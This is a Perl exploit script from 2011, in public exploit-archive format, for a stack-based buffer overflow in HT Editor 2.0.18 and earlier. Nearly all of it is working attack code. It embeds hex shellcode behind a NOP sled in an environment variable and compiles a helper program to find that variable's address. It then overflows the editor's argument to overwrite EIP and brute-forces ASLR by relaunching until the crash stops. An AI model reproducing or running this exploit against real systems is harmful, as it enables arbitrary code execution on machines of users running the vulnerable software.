# Exploit Title: HT Editor File openning Stack Overflow (0day)
# Date: March 30th 2011
# Author: ZadYree
# Software Link: http://hte.sourceforge.net/downloads.html
# Version: <= 2.0.18
# Tested on: Linux/Windows (buffer padding may differ on W32)
# CVE : None
 
#!/usr/bin/perl
=head1 TITLE
 
HT Editor <=2.0.18 0day Stack-Based Overflow Exploit
 
 
=head2 SYNOPSIS
 
    my $payload = ["hte", ("A" x (4108 - length(qx{pwd}))) . reverse(pack('H*', $retaddr))];
 
 
=head1 DESCRIPTION
 
The vulnerability is triggered by a too large argument (+ path) which simply lets you overwrite eip.
 
=head2 AUTHOR
 
ZadYree ~ 3LRVS Team
 
 
=head3 SEE ALSO
 
ZadYree's blog: z4d.tuxfamily.org
 
3LRVS blog: 3lrvs.tuxfamily.org
 
Shellcode based on http://www.shell-storm.org/shellcode/files/shellcode-606.php => Thanks
=cut
 
use strict;
use warnings;
 
use constant SHELLCODE =>    "\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e".
                "\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8" .
                "\xea\xff\xff\xff\x6b\x0c\x59\x9a\x53\x67" .
                "\x69\x2e\x71\x8a\xe2\x53\x6b\x69\x69\x30" .
                "\x63\x62\x74\x69\x30\x63\x6a\x6f\x8a\xe4" .
                "\x53\x52\x54\x8a\xe2\xce\x81";
 
use constant NOPZ => ("\x90" x 3000);
 
$ENV{'TAPZCODE'} = (NOPZ . SHELLCODE);
 
open(my $fh, ">", "g3tenv.c");
print $fh <<"EOF";
#include <stdio.h>
void main() {
    printf("%x", getenv("TAPZCODE"));
}
EOF
system("gcc g3tenv.c -o g3tenv");
my $retaddr = qx{./g3tenv};
 
my $payload = ["hte", ("A" x (4108 - length(qx{pwd}))) . reverse(pack('H*', $retaddr))];
 
open(my $as, "<", "/proc/sys/kernel/randomize_va_space");
my $status = <$as>;
close($as);
unless ($status != 0) {
    unlink("g3tenv.c", "g3tenv");
    exec(@$payload);
}
print "[*]ASLR detected!\012";
print "[*]Bruteforcing ASLR...\012";
while (1) {
    $payload = ["hte", ("A" x (4108 - length(qx{pwd}))) . reverse(pack('H*', $retaddr))];
    qx{@$payload};
    last unless ($? == 11);
}
unlink("g3tenv.c", "g3tenv");
die "HAPPY Hacking!";